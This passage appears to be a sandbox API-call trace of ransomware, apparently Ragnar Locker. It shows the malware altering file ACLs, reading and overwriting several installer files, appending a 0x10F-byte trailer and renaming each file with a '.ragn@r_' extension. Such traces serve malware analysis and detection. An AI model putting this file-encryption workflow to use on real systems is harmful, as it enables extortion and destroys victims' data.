(hMem=0x5d4ff20) returned 0x0 [0174.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf")) returned 0x20 [0174.589] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0174.589] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5affdf4 | out: lpFileSize=0x5affdf4*=10125) returned 1 [0174.589] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x277e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.589] GetProcessHeap () returned 0x3520000 [0174.589] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0174.590] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affdac, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5affdac*=0xf, lpOverlapped=0x0) returned 1 [0174.592] VirtualAlloc (lpAddress=0x0, dwSize=0x278d, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0174.593] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.593] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affdc8 | out: lpNewFilePointer=0x0) returned 1 [0174.593] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x278d, lpNumberOfBytesRead=0x5affd9c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affd9c*=0x278d, lpOverlapped=0x0) returned 1 [0174.594] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affda0 | out: lpNewFilePointer=0x0) returned 1 [0174.594] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x278d, nNumberOfBytesToLockHigh=0x0) returned 1 [0174.594] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x278d, lpNumberOfBytesWritten=0x5affd98, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affd98*=0x278d, lpOverlapped=0x0) returned 1 [0174.594] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x278d, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0174.594] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0174.595] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x278d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.595] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0174.595] WriteFile (in: hFile=0x3bc, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affdd8, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5affdd8*=0x100, lpOverlapped=0x0) returned 1 [0174.595] WriteFile (in: hFile=0x3bc, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affdd8, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affdd8*=0x100, lpOverlapped=0x0) returned 1 [0174.595] WriteFile (in: hFile=0x3bc, lpBuffer=0x5affddc*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affdd8, lpOverlapped=0x0 | out: lpBuffer=0x5affddc*, lpNumberOfBytesWritten=0x5affdd8*=0xf, lpOverlapped=0x0) returned 1 [0174.595] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0174.595] GetProcessHeap () returned 0x3520000 [0174.595] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0174.596] CloseHandle (hObject=0x3bc) returned 1 [0174.598] lstrcpyW (in: lpString1=0x5aff948, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" [0174.598] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf.ragn@r_B8CF767A" [0174.598] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1041\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 211 os_tid = 0x10ac [0174.591] GetNamedSecurityInfoW () returned 0x0 [0174.594] SetEntriesInAclW () returned 0x0 [0174.599] SetNamedSecurityInfoW () returned 0x0 [0174.600] LocalFree (hMem=0x3615470) returned 0x0 [0174.600] LocalFree (hMem=0x3615484) returned 0x3615484 [0174.600] LocalFree (hMem=0x5d4ff20) returned 0x0 [0174.600] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml")) returned 0x20 [0174.600] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0174.600] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5effa28 | out: lpFileSize=0x5effa28*=68226) returned 1 [0174.601] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x10a73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.601] GetProcessHeap () returned 0x3520000 [0174.601] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0174.601] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5eff9e0, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5eff9e0*=0xf, lpOverlapped=0x0) returned 1 [0174.602] VirtualAlloc (lpAddress=0x0, dwSize=0x10a82, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0174.603] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.603] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff9fc | out: lpNewFilePointer=0x0) returned 1 [0174.603] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x10a82, lpNumberOfBytesRead=0x5eff9d0, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5eff9d0*=0x10a82, lpOverlapped=0x0) returned 1 [0174.606] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff9d4 | out: lpNewFilePointer=0x0) returned 1 [0174.606] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10a82, nNumberOfBytesToLockHigh=0x0) returned 1 [0174.606] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x10a82, lpNumberOfBytesWritten=0x5eff9cc, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5eff9cc*=0x10a82, lpOverlapped=0x0) returned 1 [0174.607] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10a82, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0174.607] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0174.607] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x10a82, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.608] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0174.608] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effa0c, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5effa0c*=0x100, lpOverlapped=0x0) returned 1 [0174.608] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effa0c, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5effa0c*=0x100, lpOverlapped=0x0) returned 1 [0174.608] WriteFile (in: hFile=0x3bc, lpBuffer=0x5effa10*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5effa0c, lpOverlapped=0x0 | out: lpBuffer=0x5effa10*, lpNumberOfBytesWritten=0x5effa0c*=0xf, lpOverlapped=0x0) returned 1 [0174.608] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0174.608] GetProcessHeap () returned 0x3520000 [0174.608] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0174.608] CloseHandle (hObject=0x3bc) returned 1 [0174.610] lstrcpyW (in: lpString1=0x5eff57c, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" [0174.610] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.ragn@r_B8CF767A" [0174.611] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1041\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1041\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 213 os_tid = 0x13a4 [0174.853] GetNamedSecurityInfoW () returned 0x0 [0174.854] SetEntriesInAclW () returned 0x0 [0174.854] SetNamedSecurityInfoW () returned 0x0 [0174.855] LocalFree (hMem=0x358ee18) returned 0x0 [0174.855] LocalFree (hMem=0x358ee2c) returned 0x358ee2c [0174.855] LocalFree (hMem=0x5d4ff20) returned 0x0 [0174.855] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf")) returned 0x20 [0174.855] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3f0 [0174.855] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0x5affcec | out: lpFileSize=0x5affcec*=12687) returned 1 [0174.855] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x3180, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.855] GetProcessHeap () returned 0x3520000 [0174.855] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0174.855] ReadFile (in: hFile=0x3f0, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affca4, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5affca4*=0xf, lpOverlapped=0x0) returned 1 [0174.857] VirtualAlloc (lpAddress=0x0, dwSize=0x318f, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0174.858] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.858] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affcc0 | out: lpNewFilePointer=0x0) returned 1 [0174.858] ReadFile (in: hFile=0x3f0, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x318f, lpNumberOfBytesRead=0x5affc94, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5affc94*=0x318f, lpOverlapped=0x0) returned 1 [0174.859] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affc98 | out: lpNewFilePointer=0x0) returned 1 [0174.859] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x318f, nNumberOfBytesToLockHigh=0x0) returned 1 [0174.859] WriteFile (in: hFile=0x3f0, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x318f, lpNumberOfBytesWritten=0x5affc90, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5affc90*=0x318f, lpOverlapped=0x0) returned 1 [0174.859] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x318f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0174.859] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0174.860] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x318f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.860] LockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0174.860] WriteFile (in: hFile=0x3f0, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affcd0, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5affcd0*=0x100, lpOverlapped=0x0) returned 1 [0174.860] WriteFile (in: hFile=0x3f0, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affcd0, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affcd0*=0x100, lpOverlapped=0x0) returned 1 [0174.860] WriteFile (in: hFile=0x3f0, lpBuffer=0x5affcd4*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affcd0, lpOverlapped=0x0 | out: lpBuffer=0x5affcd4*, lpNumberOfBytesWritten=0x5affcd0*=0xf, lpOverlapped=0x0) returned 1 [0174.860] UnlockFile (hFile=0x3f0, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0174.860] GetProcessHeap () returned 0x3520000 [0174.860] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0174.860] CloseHandle (hObject=0x3f0) returned 1 [0174.868] lstrcpyW (in: lpString1=0x5aff840, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" [0174.868] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf.ragn@r_B8CF767A" [0174.868] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1042\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 216 os_tid = 0x13a0 [0174.892] GetNamedSecurityInfoW () returned 0x0 [0174.892] SetEntriesInAclW () returned 0x0 [0174.892] SetNamedSecurityInfoW () returned 0x0 [0174.893] LocalFree (hMem=0x358ee18) returned 0x0 [0174.893] LocalFree (hMem=0x358ee2c) returned 0x358ee2c [0174.893] LocalFree (hMem=0x5d4ff20) returned 0x0 [0174.893] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml")) returned 0x20 [0174.893] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0174.893] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5effc00 | out: lpFileSize=0x5effc00*=65238) returned 1 [0174.894] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xfec7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.894] GetProcessHeap () returned 0x3520000 [0174.894] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0174.894] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5effbb8, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5effbb8*=0xf, lpOverlapped=0x0) returned 1 [0174.896] VirtualAlloc (lpAddress=0x0, dwSize=0xfed6, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0174.896] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.896] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effbd4 | out: lpNewFilePointer=0x0) returned 1 [0174.896] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xfed6, lpNumberOfBytesRead=0x5effba8, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5effba8*=0xfed6, lpOverlapped=0x0) returned 1 [0174.899] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effbac | out: lpNewFilePointer=0x0) returned 1 [0174.899] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xfed6, nNumberOfBytesToLockHigh=0x0) returned 1 [0174.899] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xfed6, lpNumberOfBytesWritten=0x5effba4, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5effba4*=0xfed6, lpOverlapped=0x0) returned 1 [0174.900] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xfed6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0174.900] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0174.901] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xfed6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.901] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0174.901] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effbe4, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5effbe4*=0x100, lpOverlapped=0x0) returned 1 [0174.901] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effbe4, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5effbe4*=0x100, lpOverlapped=0x0) returned 1 [0174.901] WriteFile (in: hFile=0x3bc, lpBuffer=0x5effbe8*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5effbe4, lpOverlapped=0x0 | out: lpBuffer=0x5effbe8*, lpNumberOfBytesWritten=0x5effbe4*=0xf, lpOverlapped=0x0) returned 1 [0174.901] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0174.901] GetProcessHeap () returned 0x3520000 [0174.901] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0174.902] CloseHandle (hObject=0x3bc) returned 1 [0174.908] lstrcpyW (in: lpString1=0x5eff754, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" [0174.908] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.ragn@r_B8CF767A" [0174.908] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 217 os_tid = 0x11ac [0175.271] GetNamedSecurityInfoW () returned 0x0 [0175.272] SetEntriesInAclW () returned 0x0 [0175.272] SetNamedSecurityInfoW () returned 0x0 [0175.272] LocalFree (hMem=0x358ee18) returned 0x0 [0175.272] LocalFree (hMem=0x358ee2c) returned 0x358ee2c [0175.272] LocalFree (hMem=0x5d4ff20) returned 0x0 [0175.272] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf")) returned 0x20 [0175.273] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0175.273] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5aff890 | out: lpFileSize=0x5aff890*=3546) returned 1 [0175.273] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xdcb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.273] GetProcessHeap () returned 0x3520000 [0175.273] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0175.273] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5aff848, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5aff848*=0xf, lpOverlapped=0x0) returned 1 [0175.282] VirtualAlloc (lpAddress=0x0, dwSize=0xdda, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0175.282] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.282] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff864 | out: lpNewFilePointer=0x0) returned 1 [0175.282] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0xdda, lpNumberOfBytesRead=0x5aff838, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5aff838*=0xdda, lpOverlapped=0x0) returned 1 [0175.283] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff83c | out: lpNewFilePointer=0x0) returned 1 [0175.283] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xdda, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.283] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0xdda, lpNumberOfBytesWritten=0x5aff834, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5aff834*=0xdda, lpOverlapped=0x0) returned 1 [0175.283] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xdda, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0175.283] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0175.283] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xdda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.284] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0175.284] WriteFile (in: hFile=0x3bc, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5aff874, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5aff874*=0x100, lpOverlapped=0x0) returned 1 [0175.284] WriteFile (in: hFile=0x3bc, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5aff874, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5aff874*=0x100, lpOverlapped=0x0) returned 1 [0175.284] WriteFile (in: hFile=0x3bc, lpBuffer=0x5aff878*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5aff874, lpOverlapped=0x0 | out: lpBuffer=0x5aff878*, lpNumberOfBytesWritten=0x5aff874*=0xf, lpOverlapped=0x0) returned 1 [0175.284] UnlockFile (hFile=0x3bc, 